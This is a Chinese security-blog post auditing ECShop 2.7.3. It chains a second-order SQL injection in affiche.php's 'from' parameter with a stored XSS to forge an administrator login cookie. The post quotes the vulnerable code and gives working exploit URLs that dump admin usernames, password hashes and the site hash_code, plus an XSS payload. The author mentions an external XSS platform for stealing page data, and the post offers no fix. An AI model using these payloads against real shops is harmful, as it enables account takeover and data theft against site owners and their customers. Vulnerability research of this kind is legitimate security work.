您的位置 » 首页 » 代码审计,实用工具 » 代码审计:ecshop最新版本SQL注入+存储XSS=任意管理员登录 附利用exp

代码审计:ecshop最新版本SQL注入+存储XSS=任意管理员登录 附利用exp

发表于3年前 | 作者: seay | 分类: 代码审计, 实用工具 | 孵化于:2013年08月05日 | 文章热度:5,592 次 全屏阅读

显示不全请点击全屏阅读

一个功能点的SQL注入和存储XSS,内含多种技巧,我觉得我就是个艺术家~~

刚下的ecshop V2.7.3版本~
 
1.漏洞存在于站外广告统计功能(对应管理后台的报表统计->站外投放JS),即/affiche.php页面,将from参数(网站来源referer)存储到了数据库表ecs_adsense,而在后台的“站外投放JS”读取出来未过滤又进入了sql语句,导致二次注入。

/affiche.php 119行
$sql = "INSERT INTO " . $ecs->table('adsense') . "(from_ad, referer, clicks) VALUES ('-1', '" . $site_name . "', '1')"; //$site_name即$_GET['from']存库了
 
 
/admin/adsense.php 47-49行
/* 获取当前广告所产生的订单总数 */
$sql2 = 'SELECT COUNT(order_id) FROM ' .$ecs->table('order_info'). " WHERE from_ad='$rows[ad_id]' AND referer='$rows[referer]'"; //看到了吧,未再次addslashes导致注入
$rows['order_num'] = $db->getOne($sql2);
2.同时,输出时未对字段referer过滤,导致存储XSS。
 
3.存储XSS得到cookie本来就可以登录后台了,但我咋能这么简单?SQL注入两条得到ecs_shop_config里的hash_code和管理员的username+password,自己生成COOKIE岂不更爽?
/admin/privilege.php 136-141行
if (isset($_POST['remember']))
        {
            $time = gmtime() + 3600 * 24 * 365;
            setcookie('ECSCP[admin_id]',   $row['user_id'],                            $time);
            setcookie('ECSCP[admin_pass]', md5($row['password'] . $_CFG['hash_code']), $time);
        }

http://localhost/test/ecshop/affiche.php?from=a.baidu.com’%20and%201=2%20union%20select%20group_concat(user_id,’|’,user_name,’|’,password)%20from%20ecs_admin_user%20order%20by%201%20desc%23&ad_id=-1  //注入得管理员信息
http://localhost/test/ecshop/affiche.php?from=a.baidu.com’%20and%201=2%20union%20select%20%20value%20FROM%20`ecs_shop_config`%20WHERE%20code%20=%20’hash_code’%20order%20by%201%20desc%23&ad_id=-1 //注入得hash_code
http://localhost/test/ecshop/affiche.php?from=a.baidu.com%3Cscript%3Ealert(1)%3C/script%3E&ad_id=-1 //XSS,当然,我使用了xsser.me获取页面上的信息
 
 




作者:blue

Tags:

ECshop漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3280/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有1个筒子留下了脚印...

  • Freedom 说:
    1楼
    2013 年 8 月 5 日 下午 7:26 回复

    😯 不知为啥老是测试失败

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)